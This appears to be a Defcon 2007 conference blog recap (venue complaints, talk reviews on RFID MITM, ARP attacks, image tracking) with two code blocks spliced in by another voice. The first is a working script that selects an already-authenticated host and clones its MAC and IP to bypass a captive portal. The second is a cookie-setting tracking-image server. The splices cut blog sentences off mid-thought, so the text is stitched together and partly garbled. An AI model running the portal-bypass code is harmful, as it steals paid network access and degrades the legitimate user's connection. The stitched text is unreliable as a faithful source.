This year's defcon was similar to last year's. At the Riviera, the black and white
ball was split across two nights, a few amazingly lame talks were given, some
cool talks, and as always Dan Kaminsky's talk was entertaining.
I'm no Vegas expert, but the Riviera casino/hotel is the *worst* casino in
town. I had many conversations with fellow attendees reminiscing about how much
we missed the Alexis Park. Finding parties at the Alexis was cake - walk
outside, follow the people and noise. Parties were everywhere. There were also
3 outdoor pool areas which collected people, booze, and music each night. The
only downside to the Alexis Park was that its conference areas were too
small and too few. This downside was mitigated by three closed-circuit
TV channels that broadcast the talks live, viewable on any hotel room's TV. Watch the talks
from your room? Awesome. For parties and community, the Alexis Park ruled. For
more plentiful conference space, the Riviera is better. It's a shame we
(Defcon) outgrew the Alexis Park.
The Riviera is a giant, old, dirty resort casino. The rooms are not great, the
casino smells bad, and the food is horrible. Basically, I can't say much nice
about the place other than it does have large quantities of conference space.
The casino staff were generally nice folks, but I don't gamble so I didn't
interact with them much. Their concierge desk is horrible. Every time I asked
where I might find a particular place (pizza, sushi, flare bar, etc) that was not inside
the Riviera, they had no answers.
I went to my usual (read: small) number of talks this year. I missed a few whose
titles didn't interest me that, I later found out, covered
some cool material. Bruce Potter's talk was overflowing with people, so some of
us had to leave - sad. If you have his talk on video, please send me a url :)
There were thousands of scene whores at defcon this year. We were drowning in
them. So much so, perhaps, that some 0x90
folks made these
shirts which showed up during the I/O Active party (which was awesome, btw).
I also found that there were so many super paranoid people at Defcon. Mostly
scene whores who really have no idea what a computer is or what security is
about. Too many eavesdropped conversations where people said "I'm not turning on
wireless! I have too much important stuff on my laptop that I can't allow to
get out!" Are they that worried about being exploited? Probably. Do they really
have shit worth protecting on their laptops? Probably not. One of these people
was a student at UCSD and he talked shit about his friends' computer knowledge
constantly while his friends were supposedly writing tetris for the defcon
If you have a clue and have something on your laptop worth protecting so much
that you physically turn off wifi, then you don't bring it to defcon. Clearly
these people haven't got a clue and are just whoring up the scene. [*]
[*] One exception is reporters and other press types, who I won't require to
have security or computer clue. Of the people I overheard freaking out about
wireless, all of them were normal attendees, not press.
I flew into SFO on Monday morning. Wendy was due to land in a few hours, so I
sat at the airport so we could go home together. After signing on for wireless,
I remembered a project I've been meaning to do for a while - masquerade as a
known-valid MAC and IP combination to bypass captive portals. It's easy to do,
but I wanted it automated. Now I have a script. I'll post more on this later,
but the typical configuration of "captive-portal authentication == your mac+ip
is allowed through the firewall" is not a good way to run your pay-for
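The automation the post mentions boils down to two steps: find a neighbour the portal has already let through, then take over its MAC+IP pair. The following is an added example, not the post author's script. It assumes Linux `ip neigh` output, an interface named wlan0 and a gateway address; the neighbour table below is constructed, and the commands are returned as strings rather than executed.

```python
"""Pick a known-valid MAC+IP pair from a neighbour table and emit the
interface commands that would borrow it. Added example, not the script the
post refers to. Assumes Linux `ip neigh` output; the interface name, the
gateway and the sample table are all made up."""
import re

# Constructed sample of `ip neigh show dev wlan0` output (not a real capture).
SAMPLE_NEIGH = """\
10.20.0.1 lladdr 00:11:22:33:44:01 REACHABLE
10.20.0.57 lladdr 3c:5a:b4:00:00:57 REACHABLE
10.20.0.88 lladdr 3c:5a:b4:00:00:88 STALE
10.20.0.91 lladdr a4:b1:c1:00:00:91 REACHABLE
10.20.0.120 FAILED
"""

LINE_RE = re.compile(
    r"^(?P<ip>\S+)(?:\s+lladdr\s+(?P<mac>[0-9a-f:]{17}))?\s+(?P<state>\S+)$")


def parse_neigh(text):
    """Return (ip, mac, state) tuples; entries with no MAC (FAILED) are dropped."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m and m.group("mac"):
            out.append((m.group("ip"), m.group("mac").lower(), m.group("state")))
    return out


def choose_victim(entries, gateway):
    """Prefer a REACHABLE host that is not the gateway: it has passed traffic
    recently, so the portal has almost certainly admitted its MAC+IP already."""
    for ip, mac, state in entries:
        if ip != gateway and state == "REACHABLE":
            return ip, mac
    return None


def spoof_commands(iface, ip, mac, gateway, prefixlen=24):
    """The commands that re-address the interface as the chosen pair.
    Returned as a list so the caller (or a test) can inspect them first."""
    return [
        f"ip link set dev {iface} down",
        f"ip link set dev {iface} address {mac}",
        f"ip addr flush dev {iface}",
        f"ip addr add {ip}/{prefixlen} dev {iface}",
        f"ip link set dev {iface} up",
        f"ip route add default via {gateway} dev {iface}",
    ]


if __name__ == "__main__":
    victim = choose_victim(parse_neigh(SAMPLE_NEIGH), gateway="10.20.0.1")
    if victim:
        print("\n".join(spoof_commands("wlan0", *victim, gateway="10.20.0.1")))
```

Two practitioner caveats: the real host is still on the segment, so both machines now answer for the same address and the legitimate user's connections degrade (which is also the noisiest artifact a network operator can look for, alongside the same IP suddenly appearing behind two MACs in the neighbour table). That is exactly why keying the firewall on MAC+IP alone is weak: the "credential" is visible to everyone on the same layer 2 network and costs nothing to copy.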
One final notable event is that we took a limo ride to In-n-Out again this year.
I went to more than the talks listed below, but they weren't worth commenting
on or I don't remember them.
- Mike Schrenk - "The Executable Image Exploit"
- Before going, I thought this talk was going to be on a new twist to recent
image library exploits. It wasn't. His <sarcasm>amazing</sarcasm>
content covered something known for years, that
(wikipedia calls them deep links), could be used to track users or reveal
information by tracking the referrer url or *gasp* setting a cookie!
Mike also talked about using php to serve images and that you can set cookies
using php, but myspace filters images ending with '.php' apparently. His
workaround was to tell apache to process .jpg files as php, and he presented
this as if he was breaking some kind of new ground and that this was the
coolest thing ever: "You can fool apache into running php code on jpegs!"
Clearly by "fool" we really mean "configure the same way you do with .php
except you put .jpg". Who's fooling who? ;)
Around this time I was realizing that by "executable image" he really meant
that he was executing php code on his own server whenever someone requested an
image, again, from his server. This would have been a good presentation for
1998, perhaps, not 2007.
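For the record, here is the whole trick in working code, as an added example in Python's standard library rather than Mike's PHP or Apache setup: a handler that answers a request for something.jpg by logging the Referer, setting a cookie and returning real image bytes. The usual Apache line for the .jpg-as-php part is `AddType application/x-httpd-php .jpg`; the point is that the file extension a site filters on says nothing about what the serving host actually runs. The cookie name, the 1x1 PNG and the sample request headers below are constructed.

```python
"""Tracking image: log the Referer, set a visitor cookie, return a valid image.
Added example, not code from the talk. The cookie name, the PNG and the
request headers used by callers are made up."""
import struct
import time
import zlib
from urllib.parse import urlsplit


def _chunk(kind, data):
    """One PNG chunk: length, type, data, CRC-32 over type+data."""
    return struct.pack("!I", len(data)) + kind + data + struct.pack("!I", zlib.crc32(kind + data))


# A valid 1x1 8-bit grayscale PNG built from the spec (no opaque hex blob).
PIXEL_PNG = (b"\x89PNG\r\n\x1a\n"
             + _chunk(b"IHDR", struct.pack("!IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
             + _chunk(b"IDAT", zlib.compress(b"\x00\x00"))   # filter byte + one pixel
             + _chunk(b"IEND", b""))

HITS = []  # (path, referring host, visitor id); a real tracker writes these to a database


def tracking_response(path, headers):
    """Pure function so it is testable: (request path, header dict) ->
    (status, response headers, body). The extension in `path` is irrelevant;
    the server decides what code runs for it, not the client or the embedding site."""
    ref_host = urlsplit(headers.get("Referer", "")).netloc or "-"
    visitor = None
    for part in headers.get("Cookie", "").split(";"):
        part = part.strip()
        if part.startswith("v="):
            visitor = part[2:]
    resp = [("Content-Type", "image/png"),
            ("Cache-Control", "no-store")]       # a cached image would hide repeat views
    if visitor is None:
        visitor = "%x" % int(time.time() * 1000)
        resp.append(("Set-Cookie", f"v={visitor}; Path=/; Max-Age=31536000"))
    HITS.append((path, ref_host, visitor))
    return 200, resp, PIXEL_PNG
```

Wire it to `http.server` or any WSGI framework and every profile page that embeds the image reports which page was viewed and, via the cookie, which browser viewed it. The defence on the embedding site is the one the Referer header itself hints at: third-party images leak the page URL to whoever hosts them, so proxy or rehost images instead of trusting an extension filter.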
- Zac Franken - Biometrics and Token access control systems
This talk was great. My knowledge of rfid, biometrics, and other physical
access token systems is limited and this talk gave me lots of good
information. Furthermore, Zac gave a live demo that worked well. The tool
he made, which he called "Gecko", was really neat. Practical and cheap.
A short summary is that he was performing MITM on physical access systems. As
it turned out, most centralized security systems (biometrics, rfid locks,
etc) all talk the same protocol to the central authorization server. Gecko
simply man-in-the-middles these transactions. MITM is not new, but this
application was pretty neat and the small size of his prototype made this
kind of physical hacking practical.
He gave a live demo, which went smoothly, using a few RFID badges. Being
minimalist, the interface to his Gecko tool once it was installed was via
standard badges. He had made special "control" badges that the Gecko tool
understood to be commands such as a replay command, which would replay a
previously-intercepted, known-valid, badge read to the server.
He also talked about future versions of Gecko which might include bluetooth
or GSM, which would let you access the reader device from far away. Very neat.
- Dan Kaminsky - Design Reviewing the Web
Oh Dan. I love you. I went to Dan's talk last
year and saw the same attributes this year. His talk covered some
interesting things, but he's so full of himself. Watching him talk makes it
seem like he is the security industry. One person only, not the thousands
of security professionals and underground hackers around the world. Just
He did demo his hack of SLIRP over the web browser (flash+http) which was
pretty neat, though. Tunneling traffic through the browser into your
network. He also ported his dotplot thing from last year to winamp for fun
and profit, which wasn't very impressive but made for a good screensaver.
- Jesse D'Aguanno - Arp Reloaded
Jesse's description of this talk was that it would "build on the previous
research in this field and introduce new, more reliable attacks against the
ARP protocol which are much less identifiable and able to protect against."
He covered exactly what is already known, and nothing more. Like Mike's
talk above, this talk would belong in 1995, or earlier, not 2007. Who's
reviewing these talk submissions?
It is almost like Jesse lives in a black box. Not only did he cover
decades-old exploits, he reinvented the wheel. There are many, many tools that will
let you easily craft packets and dump them on the network. Netwox, nemesis,
and scapy are just 3 I can name off the top of my head. Ignoring the years
of development of packet crafting tools, he wrote his own crappy tool to dump
crafted arp packets onto the network, which he calls "arpcraft" and which does
exactly the same thing as netwox, nemesis, and scapy, in more or less the
same amount of typing. Weak sauce. I call shenanigans.
This lame presentation is from the same person who made headlines about his
blackberry hackery last year. Was this blackberry research really his own
work, or is he just a front for someone else's work?
He also demoed a remote shell tool using arp. Seems useless to me since arp
only goes over layer 2 and won't leave the local layer 2 network. Wxs joked
that you would be better off beating the owner of your exploit target machine
with a bat to wrest the password out of him than using a remote shell via arp,
since layer 2 means your target is almost guaranteed to be physically close.
- David Gustin - Hardware Hacking for Software Geeks
The title of this talk grabbed me immediately. The content was great!
Unfortunately, early in the talk, the speakers mentioned that sparkfun.com was a great howto site.
I spent the rest of the talk reading tutorials on that website. Oops.